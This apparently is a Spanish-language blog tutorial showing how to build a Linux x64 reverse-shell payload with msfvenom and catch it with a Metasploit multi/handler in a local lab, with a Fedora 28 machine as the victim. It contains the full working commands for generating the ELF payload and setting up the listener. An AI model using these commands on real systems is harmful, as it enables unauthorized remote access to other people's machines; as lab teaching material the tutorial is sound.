En esta entrada se realizara una practica para poder generar nuestros propios Payload con tal de conseguir un Reverse Shell de un sistemas con distribución Linux sin la necesidad de codificar absolutamente nada.

Para llevar acabo la practica he realizado el escenario en una red local y he utilizado dos equipos, el primer equipo es una distribución con Kali Linux que sera la maquina atacante y es donde viene lo necesario para realizar la explotación de un sistema Linux y la segunda maquina es Fedora 28 que sera el equipo victima del cual conseguiremos un reverse shell.

En Kali Linux empezaremos abriendo una terminal y buscando los payload’s disponibles para Linux con arquitectura de 64 bits.

# msfvenom -l | grep "linux/x64"

OD_Kali Linux_02_01_2019_11_28_20
La linea seleccionada en la imagen anterior es el payload que utilizaremos, seguido estaremos generando dicho payload agregando los siguientes parámetros:

  • -p: Especifica que payload se utilizara.
  • lhost: La IP de la maquina atacante.
  • lport: El puerto de la maquina atacante.
  • -f: El formato de salida.
  • -o: La asignación de nombre del payload.
# msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.1.222 lport=1234 -f elf -o origen_shell

OD_Kali Linux_02_01_2019_11_56_10

El payload generado esta en el home de nuestro usuario root, daremos permisos de ejecución con la siguiente linea:

# chmod +x origen_shell

OD_Kali Linux_02_01_2019_11_58_39

Ya esta listo para ser ejecutado en el equipo victima pero para dar paso a la post-explotación abriremos Metasploit y utilizaremos Meterpreter, usando en siguiente modulo.

> use exploit/multi/handler

Indicamos que payload se escogió de antemano para la explotación y asignamos la IP y el puerto del atacante.

> set payload linux/x64/meterpreter_reverse_tcp
> set lhost 192.168.1.222
> set lport 1234

Ahora nos mantendremos a la espera de que sea ejecutado nuestro payload.

> exploit

OD

La victima habiendo ejecutado el payload generado por nosotros se crea exitosamente una sesión de meterpreter, podemos realizar algunos análisis del sistema para verificar que distribución tiene, de antemano se dijo que se realizaría desde un equipo con Fedora y como observamos en la imagen de abajo se ve claramente que es Fedora 28.

OD_Kali Linux_03_01_2019_00_55_20

Verificamos en la maquina victima que el payload tiene una conexión establecida exitosa y ademas se tiene otros dos procesos ejecutándose en el equipo atacado.

Captura de pantalla_2019-01-03_01-31-15

Referencias:

Photo by Matt 📸 on Unsplash
Anuncio publicitario

Deja una respuesta

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Salir /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Salir /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Salir /  Cambiar )

Conectando a %s

A %d blogueros les gusta esto: